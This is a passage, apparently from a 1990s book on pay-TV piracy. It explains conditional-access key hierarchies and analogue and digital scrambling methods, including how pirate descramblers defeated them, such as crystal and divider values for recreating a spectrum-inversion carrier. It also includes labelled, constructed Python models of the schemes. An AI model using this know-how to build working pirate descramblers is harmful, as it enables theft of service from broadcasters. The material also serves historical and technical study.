completely hacked for at least twelve of those months. 
Embedded Secure Microcontroller Design 


The Embedded Secure Microcontroller approach was used widely 
in the mid to late 1980s. It is a largely discredited approach to design 
as in the event of a hack, each decoder has to be modified. 


On a very large service with a subscriber base numbered in millions 
this is a very expensive operation. However for a small operation 
such as a cablenet with only a few thousand subscribers it is not 
that much of a financial risk. 


This kind of architecture is more suited to cablenet operation where 
the legislation exists to protect it. It is not viable on satellite services. 
This is because the threat may come from areas where there is no 
protective legislation that the service can avail of. 
Most recent designs have followed this approach. Theoretically, the use of 
a smartcard makes the system cheaper to upgrade. However the 
economics of the situation have an effect. It is still ultimately more secure. 







What is apparent about this is that while the theory of the Detachable 
Secure Microcontroller is sound, the implementation is often flawed. These 
flaws are almost always financial and lead to the inevitable hacking of the 
system. 


Key Systems 


Many systems do not change their keys on a regular basis. The result of this 
generally is that they are catastrophically hacked. This stems from the 
complacency that permeates a channel when their system is intact. The 
business people, not understanding the situation, think that because the 
system is intact at present, it will be intact in six months time. Of course the 
reality is that no system can be guaranteed to be intact six months into the 
future. 


The classical key system is known as a Hierarchical Key System. It is the 
messiest in terms of the number of keys involved. It is also typical of the 
Embedded Secure Microcontroller systems of the eighties. 


In this type of key system, each decoder has its own unique secret key, 
which theoretically at least, is never divulged. Each month, all authorised 
decoders are sent the monthly key, which is encrypted individually with 
each decoder's unique key. This monthly key is decrypted in all authorised 
decoders and then used to decrypt the session key. The session key can be 
changed on a programme by programme basis or even every few seconds. 


This type of key system is more suited to a high bandwidth scrambling 
system. In practice, it is common to find this key system in use on Inclusion 
Principle systems. A continuous whitelist has to be transmitted in addition to 
the other access control traffic. 


The alternative to the hierarchical form of key system is where the decoder 
or smart card contains all the necessary data and algorithms to decode the 
channel but will only do so when it is authorised to do so. 


In terms of data to be transmitted, this system is the more economical of the 
two. The only data flowing over the air is the turn-on and turn-off data. No 
keys have to be transmitted over the air. Instead a blacklist is transmitted 
continuously. The best example of this type of system is the VideoCrypt 
system. 


It is rare to find a system that relies on a completely hierarchical structure. 
Most of them tend to integrate some form of key update facility. The best 
example of this kind of system is the EuroCrypt-M system (see Chapter 9). 
[Figure] Example Of A Simple Key Protocol: a three-level key hierarchy. At 
the lowest level is the Operational key and this is continually changing, 
often every few seconds. In a system like EuroCrypt, these keys would 
correspond to the Management Key, the Operational Key and the 
Control Word. 


Most hacks only have access to the Operational key. Therefore they can use 
this to decode the Control Word. However should the Operational key change 
they will not be able to decode the Control Word. 


The Management key is used to encrypt the new Operational key. Thus a hack 
on the Management keys is far more serious. Many of the newer EuroCrypt 
channels have resorted to this kind of ECM. 
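The hierarchical key system described above (unique key, monthly key, session key) and the Management Key / Operational Key / Control Word hierarchy of the key protocol figure, as an added example that is not from the book or from any real system: the headend wraps a fresh monthly key once per authorised decoder under that decoder's unique key, then wraps each session key under the monthly key, so a decoder that stops receiving the monthly update loses the session keys as soon as the monthly key rotates. The wrap primitive (an HMAC-SHA256 keystream plus tag), the message layouts and the decoder IDs are constructed stand-ins, not the algorithms of EuroCrypt or any other system.

```python
import hashlib
import hmac
import secrets

KEY_LEN = 16  # constructed key size; the real systems' key sizes differ

def _keystream(key, label, length):
    """Expand key into a keystream with HMAC-SHA256 in counter mode (a stand-in PRF)."""
    out, counter = b"", 0
    while len(out) < length:
        out += hmac.new(key, label + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]

def wrap(kek, label, payload):
    """Encrypt payload under kek and tag it so a receiver can tell a wrong key from a right one.
    label must be unique per message (month, period and decoder ID below) so no keystream repeats."""
    ct = bytes(p ^ k for p, k in zip(payload, _keystream(kek, b"enc|" + label, len(payload))))
    tag = hmac.new(kek, b"mac|" + label + ct, hashlib.sha256).digest()[:8]
    return ct, tag

def unwrap(kek, label, ct, tag):
    """Inverse of wrap; returns None when the tag fails (wrong key or tampered message)."""
    expect = hmac.new(kek, b"mac|" + label + ct, hashlib.sha256).digest()[:8]
    if not hmac.compare_digest(expect, tag):
        return None
    return bytes(c ^ k for c, k in zip(ct, _keystream(kek, b"enc|" + label, len(ct))))

class Headend:
    def __init__(self):
        self.unique_keys = {}    # decoder_id -> key fixed at manufacture (EuroCrypt: Management Key)
        self.monthly_key = None  # EuroCrypt: Operational Key
        self.month = 0
        self.period = 0

    def enrol(self, decoder_id):
        self.unique_keys[decoder_id] = secrets.token_bytes(KEY_LEN)
        return self.unique_keys[decoder_id]

    def new_month(self, authorised_ids):
        """Fresh monthly key, wrapped once per authorised decoder: this is the whitelist traffic."""
        self.month += 1
        self.monthly_key = secrets.token_bytes(KEY_LEN)
        emms = []
        for did in authorised_ids:
            ct, tag = wrap(self.unique_keys[did], b"EMM|%d|%d" % (self.month, did), self.monthly_key)
            emms.append((did, self.month, ct, tag))
        return emms

    def next_session(self):
        """Fresh session key (EuroCrypt: Control Word), wrapped under the current monthly key."""
        self.period += 1
        session_key = secrets.token_bytes(KEY_LEN)
        ct, tag = wrap(self.monthly_key, b"ECM|%d|%d" % (self.month, self.period), session_key)
        return session_key, (self.month, self.period, ct, tag)

class Decoder:
    def __init__(self, decoder_id, unique_key):
        self.id, self.unique_key = decoder_id, unique_key
        self.monthly_key, self.month = None, None

    def receive_emm(self, emm):
        did, month, ct, tag = emm
        if did != self.id:
            return False  # addressed to another decoder and wrapped under that decoder's key
        key = unwrap(self.unique_key, b"EMM|%d|%d" % (month, did), ct, tag)
        if key is None:
            return False
        self.monthly_key, self.month = key, month
        return True

    def receive_ecm(self, ecm):
        month, period, ct, tag = ecm
        if self.monthly_key is None or month != self.month:
            return None  # no monthly key, or only last month's: the session key stays opaque
        return unwrap(self.monthly_key, b"ECM|%d|%d" % (month, period), ct, tag)

def run_demo():
    """Decoders 1 and 2 subscribe for month 1; decoder 2 lapses in month 2; 3 never subscribes."""
    head = Headend()
    decoders = {did: Decoder(did, head.enrol(did)) for did in (1, 2, 3)}
    result = {}
    for month, authorised in ((1, [1, 2]), (2, [1])):
        emms = head.new_month(authorised)
        for emm in emms:
            for d in decoders.values():
                d.receive_emm(emm)
        session_key, ecm = head.next_session()
        result[month] = {
            "emm_count": len(emms),  # one whitelist entry per authorised decoder
            "can_decode": {did: d.receive_ecm(ecm) == session_key for did, d in decoders.items()},
        }
    return result
```

The `emm_count` per month is the whitelist cost the text attributes to Inclusion Principle systems, and decoder 2 in month 2 is the position of a hack that holds only the old Operational key.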
Many systems do not change their keys on a regular basis. The reason for 
this is mainly that the system uses an access control or authorisation 
routine to determine which decoders should be allowed to decode the signal. 


The decoder or smart card may have the necessary key/algorithm 
combination to decode the signal but unless it is properly authorised, it will 
not decode the signal - well not unless it has been hacked. 


The fatal flaw in this approach of storing a valid key set and algorithm in the 
decoder or smart card was demonstrated with the hacking of VideoCrypt 
and EuroCrypt. If a system depends on the authorisation access control 
layer to permit the decoding of the signal without a regular key/algorithm 
update, then it is completely compromised in the event of a hack. If the 
hacker can then make the key/algorithm combination function without the 
intervention of the access control layer, then only a complete change of 
cards or a decoder retrofit will cure the problem. 


The length between key changes on some of the D2-MAC EuroCrypt-M 
channels has baffled people. The theories on this abound. Some have 
claimed that the reason for the less than regular updates is because the 
channels are more interested in keeping existing subscribers' cards working 
without problems than in stopping the piracy. The real situation is more 
complex. 


On the affected channels, the fact that the management keys have been 
compromised is known to the channels. This means that the pirates can 
watch the new keys coming down over the air. The ordinary pirate card, not 
having the management key, does not get the update and gets knocked out. 
The pirates can then offer the new key to pirate card users for an upgrade 
fee. Therefore why, the channels think, should they contribute to the bank 
accounts of the pirates by implementing a key change? 


The Techniques 


When all the hype of the manufacturers dies down, when the questionable 
claims of the PR people are ignored and when the techniques themselves 
are examined, it becomes clear that there are really only a few fundamental 
analogue scrambling techniques. 


Naturally, the manufacturers will claim that their system is totally different 
from another manufacturers system even while they are using the same 
scrambling technique. The difference is often based on the access control 
aspect. The proof is that a hack on a system using one technique can be 
applied to another system from another manufacturer that uses the same 
technique. 


Most of the analogue techniques are gradually dropping out of use on 
satellite borne systems. This is due more to the nature of hacking on satellite 
based systems than anything else. With a widely available system, the 
range of threats is greater. With more hackers working on the problem, the 
time until compromise is shorter. 


On a system relying on analogue techniques, a hack on the technique is 
generally fatal. Despite this, these techniques, or rather variants of these 
techniques continue to be used in cable based systems. The reasons are 
partly financial and partly technological. 


The hacks on satellite based systems are carried out at baseband. Cable 
based systems, however, seem to favour the use of RF based scrambling 
than baseband techniques. The use of techniques that can be applied at the 
RF stage make for cheaper production costs. 


For a hacker, all of the above means that attacking a cable based 
scrambling system in the same manner as attacking a baseband scrambling 
system is doomed to probable financial failure. 


In order to hack an RF based system, a potential pirate decoder requires an 
RF stage. The best example of this is the cable based variant of Gated 
Synch Suppression. 


On a baseband system, Gated Synch Suppression means that the synch 
pulses, (and generally the rest of the horizontal blanking interval), are 
voltage shifted up into the active video region of the line. On an RF based 
implementation, the actual amplitude of the pulses is changed. 


Hacking the baseband version means that synch pulse would have to be 
voltage shifted down to the original level. Hacking the cable based (RF) 
variant means that the horizontal blanking section of the RF signal has to be 
amplified by the correct amount. So an RF hack would require an RF stage 
and some circuitry for determining the correct timing and amplification level. 
Hackers found it simpler to modify the operation of the official descrambler 
in order to make it operate in a piratical manner. Cable based systems and 
hacks are covered in greater detail in Chapter 8. 
Analogue Video Scrambling 


Synch Manipulative Systems 


A Synch Manipulative System interferes with the synch pulses in the signal. 
The aim of such a system is to prevent the television receiver from locking 
up the picture. Most of the techniques are rather primitive when compared 
to digital video techniques but nevertheless they are effective. Perhaps 
more importantly for some applications, they are cheap. This does limit the 
use of systems based on these methods to small cable systems. 


The weakness in a synch manipulative system is that it tends to leave the 
colour burst alone. While it is true that the colour burst is often voltage 
shifted with respect to the video, the actual timing is the same. It is therefore 
possible to hack the system by locking a synch generator with the colour 
burst. Many of the old pirate decoders for the analogue satellite television 
systems used this method of locking. 


Synch suppression is a relatively old scrambling technique. It is rarely used 
on its own. The horizontal synch pulse or horizontal blanking area is pushed 
in the video region of the signal. There are two accepted formats for synch 
suppression; pulse gated and sine wave. 


Pulse Gated Synch Suppression 


A pulse gated synch suppression system requires a pulse train phased with 
the scrambled signal for descrambling. The pulse train is used to control a 
"pull down" circuit that restores the horizontal blanking intervals or synch 
pulses to the correct levels. 


The pulse train or recovery signal for the scrambled signal is generally 
transmitted on a separate subcarrier as in the FilmNet case. With the 
FilmNet Matsushita SATPAC system a composite synch signal was 
transmitted on a subcarrier at 7.56 MHz. On the cable version of the 
scrambling system, the composite synch signal is amplitude modulated 
onto the FM audio subcarrier. 


Sine Wave Synch Suppression 


Sine wave synch suppression uses a sine wave to push the synch signals 
into the active video region. The frequency of the sine wave can be close to 
line frequency or close to a multiple of line frequency as in the Sat Tel SAVE 
system. 
The reason for the higher frequency being close to a multiple of the line 
frequency is that it creates a beat frequency. This beat frequency also 
interferes with the video and adds to the scrambled effect. 


The descrambling of a sine wave scrambled signal is not as straight forward 
as the pulse gated system. The sine wave may or may not be transmitted 
with the signal. On some of the cable systems, the recovery sine wave is 
transmitted in an amplitude modulated format on the FM audio subcarrier. 
This method of descrambling is not exactly feasible on satellite. The most 
common method used on satellite is regeneration. The sine wave is 
stripped from the scrambled video signal and sent to a phase locked loop. 
The PLL is generally running at a high multiple of the sine wave frequency. 
In the SAVE system, the frequency of the interfering sine wave is 
approximately six times line frequency, (93.750 KHz). The PLL in the 
descrambler runs at sixty four times the sine wave frequency, (approx. 6.0 
MHz). 


Synch Removal And Replacement 


The removal of the horizontal or vertical synchs is an effective if rather 
insecure method of scrambling a video signal. Since the television receiver 
has no synch signal it cannot lock the picture. The colour burst is generally 
used by descramblers for lockup. The timing of the colour burst is rarely 
changed. 


The replacement of the synch pulses with digital data is the commonest use 
of this scrambling facility. It is used in the OAK Orion system and the 
LuxCrypt systems. Digital data and audio blocks are used instead of the 
synch pulses. In the Orion system, a 2.5 MHz synch burst is transmitted 
prior to the data. This provides a lockup for the synch generators in the 
descramblers. The pirate descramblers used the synch burst to recreate the 
synch signals using monostables and simple PLLs. The LuxCrypt system 
uses a 5.792 MHz burst. 


Synch Inversion 


Synch inversion is a particularly nasty form of scrambling. Most of the 
polarity detection circuitry in pirate descramblers is geared towards 
complete line inversion. With this facility, only the blanking or synch section 
of the signal is inverted. The facility would optimally be used in a pulse gated 
system where the synch is suppressed. 


Since polarity detection circuitry detects the difference between the 
horizontal synch pulse and horizontal blanking, the video polarity is judged 
by these levels. The FilmNet SATPAC system used this weakness in the 
pirate descramblers to their advantage. They inserted a peak voltage in the 
horizontal synch pulse so that the pirate descramblers could not interpret 
the polarity of the video. 


[Figure: Line Inversion (PAL 625). Panels: Normal Polarity Line, Synch 
Suppressed; Inverse Polarity Line, Synch Suppressed; Synch Only Or Video 
Only Inversion; Video Only Inversion (the suppressed synch is normal 
polarity and the video section is inverted); Synch Only Inversion (the 
suppressed synch is inverted and the video polarity is normal).] 


Note: The terms Video Only Inversion and Synch Only Inversion 
can mean the same thing when applied to a synch suppressed 
system. On a clean synch system, Video Only Inversion is the 
only inversion type permitted. 


The actual inversion sequence can be line based or field based. 


Video Inversion 


Video inversion is perhaps the most widely used facility. It can be applied to 
gated, sine suppressed or normal signals. It can be tricky in application as 
the level of the descrambled polarities may differ by a few millivolts. This 
means that either a key must be included in the scrambled video or a 
balance potentiometer must be included in the descrambler. 


A key takes the form of a section of the horizontal blanking level that is 
inverted with the video. In the scrambled signal, the horizontal blanking level 
will appear at approximately half video. With the video range being 
approximately 700 mV this half video point would be 350 mV. This provides 
the descrambler with a reference level on the descrambled line. The key 
can be sampled and compared with the normal polarity key. 


This method of scrambling is more common on satellite based systems. It is 
not really suitable for terrestrial or cable based systems. 
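The keyed inversion scheme just described, as an added example (it is not code from the book or from any real decoder). The 700 mV video range follows the text; the number of key samples, their position at the start of the line and the key level (blanking at black, 0 mV) are assumptions made for this example, as is the `error_mv` term that models the few-millivolt level mismatch the text mentions.

```python
# Keyed video inversion and its descrambling, modelled on the description
# above.  Added example, not from the book or any real decoder.  Levels are in
# millivolts; the 700 mV video range follows the text, while the key length,
# its position at the start of the line and its level (black, 0 mV) are
# assumptions made here.

VIDEO_MV = 700.0      # page: video range is approximately 700 mV
KEY_LEN = 8           # assumption: number of blanking samples carried as the key
KEY_LEVEL_MV = 0.0    # assumption: the key is blanking at black level


def make_line(video_mv):
    """Constructed line: key section at blanking level, then active video."""
    return [KEY_LEVEL_MV] * KEY_LEN + [float(v) for v in video_mv]


def invert(samples, error_mv=0.0):
    """Invert about the video range.  error_mv models the few-millivolt level
    mismatch between polarities that the text says makes inversion tricky."""
    return [VIDEO_MV - s + error_mv for s in samples]


def scramble_line(line, invert_this_line, error_mv=0.0):
    """Scrambler side: the key is inverted together with the video, so the
    descrambler can read the line's polarity from it."""
    return invert(line, error_mv) if invert_this_line else list(line)


def detect_polarity(scrambled, tolerance_mv=50.0):
    """Descrambler side: sample the key and compare it with the normal-polarity
    key level.  Returns 'normal', 'inverted' or 'unknown'."""
    key = sum(scrambled[:KEY_LEN]) / KEY_LEN
    if abs(key - KEY_LEVEL_MV) <= tolerance_mv:
        return "normal"
    if abs(key - (VIDEO_MV - KEY_LEVEL_MV)) <= tolerance_mv:
        return "inverted"
    return "unknown"


def descramble_line(scrambled):
    """Re-invert if needed, then use the key as the balance reference to remove
    any residual offset (the job the text gives to a balance potentiometer)."""
    polarity = detect_polarity(scrambled)
    if polarity == "unknown":
        raise ValueError("key level not recognised; polarity cannot be decided")
    line = invert(scrambled) if polarity == "inverted" else list(scrambled)
    offset = sum(line[:KEY_LEN]) / KEY_LEN - KEY_LEVEL_MV
    return [s - offset for s in line]
```

The `unknown` branch is the failure mode the SATPAC trick above exploits: if the key region no longer sits at either expected level, a descrambler that relies on the key alone has nothing to decide polarity with.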


Field Inversion 


This is one of the simplest methods to implement and naturally the easiest 
to hack. One complete field of video, including field synch is inverted. The 
following field is normal polarity. Other sequences such as 1 normal and 3 
invert can be derived from some flip-flops and a bit of combinational logic. It 
can be applied to the video only or the complete field. The inversion point is 
often half way through one of the lines in the VBI as opposed to the 
beginning or end of the field synch. 


Line Inversion 


Line based inversion comes in two basic forms; Keyed And Nokey. The 
keyed inversion contains a polarity indicator in the line blanking. This is 
commonly used in systems like Oak ORION or LuxCrypt. This is the least 
secure form. The nokey video inversion is a more secure form. There is no 
indicator as to the exact polarity of the video information. The inversion 
sequence can be sequential or pseudo random. Due to the difficulty of 
establishing the black level in descramblers, the Keyed inversion is the 
commonest. 
Note: In a Fixed Video Delay system, the video always remains in 
the confines of the video region. The positions of the synchs 
are unchanged. In a Variable Video Delay system, the video 
does not have to remain in the confines of the video region. It 
can enter the area that would be occupied by the synch of the 
next line. This makes it usable with MAC systems rather than PAL 
or SECAM. 
Average Peak Level Inversion 


Average Peak Level inversion, pronounced ‘apple’, is a more secure 
method of effecting video inversion. The polarity of the video is decided by 
the amount of black or white in a scene. Each frame is sampled and when 
the cumulative value of the samples exceeds a preset threshold the video is 
inverted. It does not change polarity again until the threshold is exceeded. 


Video Delay 


The video delay form of scrambling is used in a number of scrambling 
systems. The old Discret system as used by Canal Plus is based on this 
form of scrambling. The B-MAC system by Scientific Atlanta also uses this 
scrambling method though the delay increments are smaller. 


Fixed Delay 


The fixed delay facility delays the video on each line by one of a number of 
fixed delays. In the Discret system, the delays are 0, 902 nS and 1804 nS. 
The delay can be implemented by CCDs, glass delay lines or gyrator delay 
lines. Once the length of the delay lines are known, the system is easily 
hacked. 


The term Fixed Delay is applied here as there are only three delay states. 
The main flaw in the Discret design is that the delay units are readily 
emulated by existing electronic components. 


Variable Delay 


The variable delay is a lot harder to hack. In the B-MAC system the video 
sections of the line are delayed by varying the length of the data block. 
Again it is a question of ascertaining the minimal delay length and the 
maximum number of delay units. 


This type of scrambling is harder to hack in a reliable manner as there is a 
greater variance of delay length. Off the shelf solutions can be more difficult 
to find in this type of scrambling system as the video has to be expanded 
digitally. 


Given the advances in video electronics, the security of variable delay video 
scrambling is not as good as it was in the eighties when B-MAC was 
developed. 
Video Position Modulation 


This is the Macrovision PhaseKrypt system. It is one of the hardest systems 
to hack. It is a very secure method of video scrambling. The position of the 
video in the line is modulated. The video information itself is slightly 
shortened to accommodate this. The delay section at the end and beginning 
of each video area are filled with electronically stretched video. The delay is 
too slight to be properly detected and as a result it is extremely difficult to 
hack using a video only approach. 


This is actually an ideal system for small scale deployment such as on 
cablenets. However on satellite borne transmissions carrying high premium 
programming, things change. The system relies on the access control 
circuitry remaining unhacked. With a large scale satellite borne system, 
hacking the access control circuitry, even if it is ASIC based is a very real 
possibility as FilmNet found to their cost. 


Digital Video Techniques 


The following techniques are generally applied to digitised video signals. 
Systems employing these facilities are generally harder to hack and in most 
cases the scrambling process is not actually hacked. The weak point is 
almost invariably the control circuitry. Of course with the advances in video 
electronics and the falling price of processing power, hacks on the video 
aspect of digital systems are now more likely. 


The majority of new systems hitting the market use one or more of the 
digital video techniques outlined below. The most favoured type of 
scrambling is the line shuffle. While the cheaper option is to use a sliding 
bar shuffle, there are other more secure versions that rely on full field 
shuffle. The full field shuffle is a memory intensive option and the price per 
decoder reflects this. As a result of the high price of decoder, it is aimed 
more at services carrying extremely high value programming rather than at 
the ordinary premium programming channel. 


The one factor that will decide whether a digital video based system is 
hacked via the video is the cost of reverse-engineering the smart card as 
opposed to creating a pirate digital video decoder. As the price of Digital 
Signal Processor chips falls, the scrambling systems relying on digital 
techniques will become increasingly unsafe. Already there has been a 
hardware based hack on the Nagra system (SECAM version). This system 
has been in operation for some six years and has lasted that time without a 
serious hack. 


In terms of security against a hardware hack, line cut and rotate fares better 
than line shuffle. With experiments with a hardware based hack on line cut 
and rotate, the pirate decoder has to be reset every few minutes as scenes 
with a high content of one particular colour tend to cause problems for the 
processing circuitry. In general these systems are complex. Chapter 7 deals 
in detail with digital video systems. 


Cut And Invert 


The digitised line is cut at a particular point and all data following that point 
is inverted. This can be achieved in analogue technology but there tends to 
be residual problems such as tilt. 


Cut And Rotate 


The digitised line is cut at a particular point and the two sections are rotated 
so that the last section becomes the first and vice versa. It is a rather secure 
method but the cut points have to be masked to prevent weakness and 
noise. The VideoCrypt system uses this form of scrambling as does 
Cryptovision. 


The cut sequence is generated by a Pseudo Random Number Generator 
that is seeded by a seed transmitted in encrypted format over the air. There 
have been some experiments to establish the parameters of the PRNG in 
the VideoCrypt decoder. Of course the problem here is that establishing the 
cut points in the scrambled video is generally too difficult. This means 
that a hardware hack based on detecting the cut points and resynchronising 
the sequence to the PRNG sequence is not viable as long as the smart card 
is effectively compromised. 
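Cut and rotate with a PRNG-driven cut sequence, as an added example of the mechanism described above (this is not VideoCrypt's or Cryptovision's algorithm). The 256 cut points come from the text; the number of samples per line, the use of Python's `random` module in place of the decoder's PRNG, and the mapping of a cut point onto a sample index are assumptions. The `seam_index` helper shows why the text says the cut points have to be masked: on smooth picture content the rotation leaves a step at the cut point.

```python
# Line cut and rotate with a PRNG-driven cut sequence, following the
# description above.  Added example; it is not VideoCrypt's or Cryptovision's
# algorithm.  The line length, the use of Python's random module in place of
# the decoder's PRNG and the way a cut point maps onto samples are assumptions.
import random

CUT_POINTS = 256            # page: the video is cut at one of 256 points
SAMPLES_PER_LINE = 512      # assumption: active-video samples per line


def cut_sequence(seed, n_lines):
    """One cut point per line from a PRNG seeded with the (decrypted) seed."""
    prng = random.Random(seed)   # stands in for the decoder's PRNG
    return [prng.randrange(CUT_POINTS) for _ in range(n_lines)]


def cut_index(cut_point):
    """Sample index at which cut point 0..255 falls on the line."""
    return cut_point * SAMPLES_PER_LINE // CUT_POINTS


def rotate_line(line, cut_point):
    """Scrambler: segments /ab/ and /cd/ swap, so /cd/ is sent first."""
    i = cut_index(cut_point)
    return line[i:] + line[:i]


def unrotate_line(line, cut_point):
    """Descrambler: hold the /cd/ segment back and clock /ab/ out first."""
    cd_len = len(line) - cut_index(cut_point)
    return line[cd_len:] + line[:cd_len]


def scramble_field(lines, seed):
    cuts = cut_sequence(seed, len(lines))
    return [rotate_line(line, c) for line, c in zip(lines, cuts)]


def descramble_field(lines, seed):
    cuts = cut_sequence(seed, len(lines))
    return [unrotate_line(line, c) for line, c in zip(lines, cuts)]


def seam_index(line):
    """Index of the largest jump between neighbouring samples.  On smooth
    picture content this lands on the cut point, which is why the text says
    the cut points have to be masked."""
    return max(range(1, len(line)), key=lambda j: abs(line[j] - line[j - 1]))
```

The descrambler needs nothing from the picture itself, only the seed; that is the property the text relies on when it says the weak point is the smart card rather than the video.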


Line Shuffle 


This system is purely a digital one. The actual field position of each line is 
changed. For example, line 26 might become line 38. The system can be 
applied on a field or frame basis. 


However applying this type of scrambling on a field or frame basis is 
memory intensive. As a result, a decoder for such a system would be 
expensive. The alternative is to use a smaller block of lines in each field and, 
for added security, slide the block in each field so that a different block of 
lines is selected in each field. This is a more economical option that 
produces almost as much security as the full field shuffle. 
[Figure: Line Shuffle. Original field and scrambled field. The order of the 
lines is changed though the video information remains the same.] 


[Figure: Line Cut And Rotate. The video is cut at one of 256 points and the 
segments are rotated about that point. There is an element of cloaking on 
the cut point. Descrambling involves delaying the /cd/ segment and clocking 
the /ab/ section out first.] 
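The sliding-block line shuffle from the Line Shuffle section above, as an added example (not any real system's code). The block size, the slide step and the use of Python's `random` module for the per-field permutation are assumptions; the point shown is that only `BLOCK_LINES` lines of store are needed at the decoder, while the block moves from field to field.

```python
# Line shuffle within a block that slides from field to field, following the
# Line Shuffle section above.  Added example, not any real system's code; the
# block size, slide step and the use of Python's random module for the shuffle
# order are assumptions.
import random

BLOCK_LINES = 16      # assumption: lines shuffled together in each field
SLIDE_STEP = 4        # assumption: how far the block moves each field


def block_offset(field_number, lines_per_field):
    """First line of the shuffled block in this field; it slides each field so
    a different block of lines is selected."""
    return (field_number * SLIDE_STEP) % (lines_per_field - BLOCK_LINES + 1)


def shuffle_order(seed, field_number):
    """Permutation of the block for this field, derived from the seed."""
    prng = random.Random(seed * 100003 + field_number)
    order = list(range(BLOCK_LINES))
    prng.shuffle(order)
    return order            # order[dst] = source line within the block


def shuffle_field(lines, seed, field_number):
    """Scrambler: permute the lines of one block, leave the rest untouched."""
    off = block_offset(field_number, len(lines))
    order = shuffle_order(seed, field_number)
    block = lines[off:off + BLOCK_LINES]
    out = list(lines)
    for dst, src in enumerate(order):
        out[off + dst] = block[src]
    return out


def unshuffle_field(lines, seed, field_number):
    """Descrambler: apply the inverse permutation to the same block."""
    off = block_offset(field_number, len(lines))
    order = shuffle_order(seed, field_number)
    block = lines[off:off + BLOCK_LINES]
    out = list(lines)
    for dst, src in enumerate(order):
        out[off + src] = block[dst]
    return out
```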
Hard Encryption 


This digital video technique is the most secure. The digital data of the 
samples is encrypted using an algorithm such as the DES or RSA. A 
number of services using purely digital video with hard encryption are in 
operation. The DirecTv system in the USA is a good example of this type of 
system though the smart card aspect on this system is totally compromised. 


The systems using hard encryption generally use a standard digital video 
protocol such as MPEG 2 and overlay it with encryption. This saves 
development time and means that the main demodulation circuitry can be 
bought off the shelf. The only custom aspect of the decoder is the security 
electronics. 


A number of services will commence operation in Europe in the next year or 
so. These will be based on the Digital Video Broadcasting specifications. 
Apparently they will all use a common scrambling algorithm for the video 
which will be kept top secret. The Conditional Access manufacturers will 
then provide their own security overlay. 


Audio Scrambling Techniques 


Scrambling the audio can in itself be an effective measure for low pay 
services. It tends to destroy the entertainment value of the video unless the 
video doesn’t require any audio track. Another more recent threat to the 
facility of audio scrambling is multilingual teletext subtitling. 


The use of audio scrambling has not been that apparent in Europe. While it 
is used on cable based systems, satellite based systems tend to opt for 
hard video scrambling techniques. Where audio scrambling is used on 
satellite, it is often just a token form of scrambling. One reason for this is 
that in the absence of a synch signal, most European televisions will 
automatically blank the sound. Therefore adding audio scrambling to a 
system that suppresses or manipulates the synch pulses seems like 
overkill. 


On satellite, some of the services using hard video scrambling also include 
a token audio scrambling facility. The commonest is spectrum inversion. 
This is due more to its ease of implementation than anything else. 


The only situation where hard encrypted audio was used as an add-on to 
scrambled video in Europe was on the short lived FilmNet digital audio 
system. This was an add-on for the totally compromised analogue video 
scrambling system that was in use at the time. 


In the USA, the VideoCipher II system took the opposite route to the 
European systems and used DES based encryption on digital audio while 
protecting the video with a simple synch replacement scramble. 


The general trend has been moving away from analogue audio scrambling 
methods towards more secure digital audio. The D2-MAC EuroCrypt 
system is a classic example of this trend. The video in this system is hard 
encrypted with double cut and rotate and the audio too has the facility for 
hard encryption. Many of the channels using D2-MAC EuroCrypt leave the 
audio in the clear as a barker channel. 


On the surface, digital audio appears to be a good choice for security. The 
actual digital audio datastream or signal is secure when being transmitted 
and often the manufacturers will claim that the system uses DES or RSA or 
some other secure algorithm to encrypt the over the air datastream. This of 
course is a false security. 


The point at which a digital audio scrambling system gets hacked is in the 
authorisation and access control section. A hacker will attack the official 
decoder and try to make it operate as a pirate decoder. Most of the time, 
this type of hack will succeed. A classic case of this premise breaking down 
was the FilmNet system. In the FilmNet system, a complete reverse- 
engineering of the hardware and authorisation section was necessary. The 
final hacker product was better in quality than the official FilmNet decoder. 


The VideoCipher II system followed the pattern. It was hacked because it 
was possible to hack the authorisation data. The FilmNet digital audio 
system was hacked because a complete reverse engineering of the 
decoder was possible. 


The VideoCipher II system was a good illustration of the damage that a 
single system environment can do to the satellite television business. 
VideoCipher II had a virtual stranglehold on the US satellite television 
industry with most satellite based channels resorting to it. Of course when it 
was hacked, the hack affected all channels. Because of the blanket 
deployment of the system, the hack became a self perpetuating disaster. It 
is safe to say that VideoCipher II would not have stood a snowball's chance 
in Hell in Europe. This is perhaps the prime reason that no European 
channel used VideoCipher II. 


Any digital audio system that uses a fixed algorithm and a changeable key 
set is a disaster waiting to happen. This kind of system can no longer be 
considered secure. It is a frozen architecture therefore it can be reverse 
engineered. Then it can be duplicated. Then it is up to the scrambling 
system owner to find the identity of the decoders being used to obtain the 
keys and turn them off. 


Analogue Audio Scrambling Techniques 


FM'd Audio 


The audio signal is frequency modulated on to a carrier frequency in the 
range 30 KHz to 100 KHz. The commonest in the US systems are 62.5 
KHz, 31.5 KHz, 40 KHz and 63 KHz. While this form of audio scrambling 
was used in the USA, it has not been used on any satellite systems in 
Europe. 


Descrambling this type of scrambled audio requires a PLL type circuit. 
There are a number of other types of demodulators but the PLL is the 
easiest to adapt to this low frequency. The two commonest PLL ICs used 
for this application are the NE565 and the 4046. The circuit diagram for the 
NE565 operating at 62.5 KHz is given. The PLL demodulator will need to be 
preceded by an amplifier as the response of the audio demodulators in most 
receivers will not be sufficient. Ideally a separate demodulator should be 
used for the descrambler. 


In many respects this is an antique. It does not offer any decent security. 
Where it was used, the video was also scrambled, often with a reasonably 
secure scrambling system. 


Spectrum Inversion 


Spectrum inversion is presently being used by the Discret scrambling 
system. The audio on the Nagra Syster is also scrambled using this 
technique. 


This is essentially a single sideband technique applied to audio and was 
also used for some simple telephone scrambling systems of the late 
seventies. The descrambling of this system is slightly more complicated 
than the previous one. The centre frequency, (the frequency around which 
the spectrum is rotated), has to be recreated. 


In the RITC Discret 1 official descrambler, this frequency, (12.8 KHz), is 
obtained by dividing down the output of an 8.0 MHz crystal oscillator by 625. 
In the pirate Radio Plans design, the output of a crystal oscillator running at 
3.2768 MHz was divided by 512 to produce the carrier. A more elegant 
method would be phase locking a PLL to the vertical synch. By using a 
divider of 256 in the VCO - Phase Detector path, the voltage controlled 
oscillator output would be 12.8 KHz. 


[Figure: Analogue Audio Scrambling Techniques. Three plots of voltage 
against frequency: Spectrum Inversion, with the carrier frequency marked; 
Spectrum Shift, where the audio spectrum is shifted upwards in frequency 
(it is more complex than inversion and is not frequently used due to the 
cost); FM'ed Audio, where the audio is FMed on to a frequency, typically 
three or four times line frequency.] 


The core of the hacker audio descrambler for spectrum inversion is the 
